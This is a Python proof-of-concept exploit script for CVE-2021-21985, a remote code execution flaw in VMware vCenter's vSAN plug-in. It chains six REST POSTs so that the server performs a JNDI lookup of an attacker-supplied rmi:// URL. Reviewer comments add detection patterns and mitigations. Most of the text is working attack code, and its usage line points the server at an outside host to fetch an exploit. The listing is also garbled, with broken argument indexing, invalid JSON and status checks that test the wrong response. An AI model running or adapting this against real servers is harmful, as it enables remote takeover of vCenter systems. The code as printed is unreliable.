EXP
# Proof-of-concept request sequence for CVE-2021-21985 (the CVE id is taken
# from the usage string below), a remote code execution flaw in the vSAN
# plug-in endpoint of VMware vCenter Server's HTML5 client.
#
# What the script does, as far as the listing shows: it sends six JSON POSTs
# to sub-paths of one REST endpoint (setTargetObject, setStaticMethod,
# setTargetMethod, setArguments, prepare, invoke) so that the server ends up
# calling javax.naming.InitialContext.doLookup with a caller-supplied URL.
#
# NOTE(review): the listing lost characters during extraction (`sys.argv1`,
# `uris0` ... `uris5`, and the JSON literal for `stage_prepare`), so it does
# not run as printed. The code is reproduced unchanged; only layout and
# comments were touched.
#
# Defender notes (derived from the values visible in this listing):
#   * Detection: POST requests whose path contains
#     "ui/h5-vsan/rest/proxy/service/" followed by any of the six sub-paths
#     above, especially in quick succession from one client; request bodies
#     whose "methodInput" names "javax.naming.InitialContext.doLookup" or
#     carries an "rmi://" URL. The fixed User-Agent "pentest" is a weak
#     indicator because it is a one-line change.
#   * Presumably a successful run makes the server open an outbound
#     connection to the supplied URL; outbound traffic from the vCenter
#     appliance to unexpected hosts is worth alerting on (confirm against
#     your own telemetry).
#   * Mitigation: apply the vendor fix for CVE-2021-21985, keep the vCenter
#     management interface off untrusted networks, and restrict outbound
#     connections from the appliance.
import requests
import sys
import json


def send_request(host,uri,json):
    """POST `json` to host + baseuri + uri and return the response body text.

    `baseuri` and `headers` are not parameters; they are read from module
    globals assigned in the `__main__` block. The `json` parameter shadows
    the imported `json` module inside this function.

    Returns False instead of raising if anything in the request fails.
    """
    try:
        # verify=False turns off TLS certificate validation for this request.
        req = requests.post(url=host+baseuri+uri,json=json,headers=headers,verify=False)
        return req.text
    except:
        # Bare except: every error (network, TLS, bad URL, ...) becomes False.
        return False


def check_false(request):
    """Return True when `request` is False or lacks the substring 'result'.

    Prints "* No Vuln!" in that case. Otherwise falls off the end and
    returns None (falsy), which callers treat as "continue".
    """
    if request ==False or 'result' not in request:
        print("* No Vuln!")
        return True


if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('''python3 cve-2021-21985.py https://host rmi://8.8.8.8:1099/Exploit''')
        sys.exit()
    # NOTE(review): `sys.argv1` / `sys.argv2` are not valid attributes of
    # sys; see the extraction note at the top of the listing.
    host = sys.argv1
    payload = sys.argv2
    # Endpoint prefix and the six sub-paths requested in order below.
    baseuri = "ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService"
    uris = "/setTargetObject", "/setStaticMethod", "/setTargetMethod", "/setArguments", "/prepare", "/invoke"
    headers = {'Content-Type': 'application/json', "User-Agent": "pentest"}
    # One JSON body per stage; each carries a single "methodInput" field.
    stage_setTargetObject = json.loads('{"methodInput":null}')
    stage_setStaticMethod = json.loads('{"methodInput":"javax.naming.InitialContext.doLookup"}')
    stage_setTargetMethod = json.loads('{"methodInput":"doLookup"}')
    # The second command-line argument is formatted into the JSON text
    # without any escaping.
    stage_setArguments = json.loads('{"methodInput":"%s"}'%payload)
    # As printed, this literal is not valid JSON and json.loads would raise.
    stage_prepare = json.loads('{"methodInput":}')
    print("* start init TargetObject")
    # Step 1: setTargetObject
    init_request = send_request(host,uris0,json=stage_setTargetObject)
    if check_false(init_request):
        print("* init failed!")
        exit()
    # NOTE(review): every check from here on re-tests `init_request` (the
    # step-1 response), not the response just received, so a run that prints
    # no failure message says nothing about steps 2-6. Do not treat this
    # script's output as a reliable vulnerability check.
    # Step 2: setStaticMethod
    StaticMethod = send_request(host,uris1,json=stage_setStaticMethod)
    if check_false(init_request):
        print("* StaticMethod init failed!")
        exit()
    # Step 3: setTargetMethod
    StaticMethod = send_request(host,uris2,json=stage_setTargetMethod)
    if check_false(init_request):
        print("* setTarget Method failed!")
        exit()
    # Step 4: setArguments
    # print(stage_setArguments)
    setArguments = send_request(host,uris3,json=stage_setArguments)
    if check_false(init_request):
        print("* setArguments failstage_setArgumentsed!")
        exit()
    # Step 5: prepare
    setArguments = send_request(host,uris4,json=stage_prepare)
    if check_false(init_request):
        print("* stage_prepare failed!")
        exit()
    # Step 6: invoke (sent with the same body as the prepare step)
    setArguments = send_request(host,uris5,json=stage_prepare)
    if check_false(init_request):
        print("* invoke failed!")
        exit()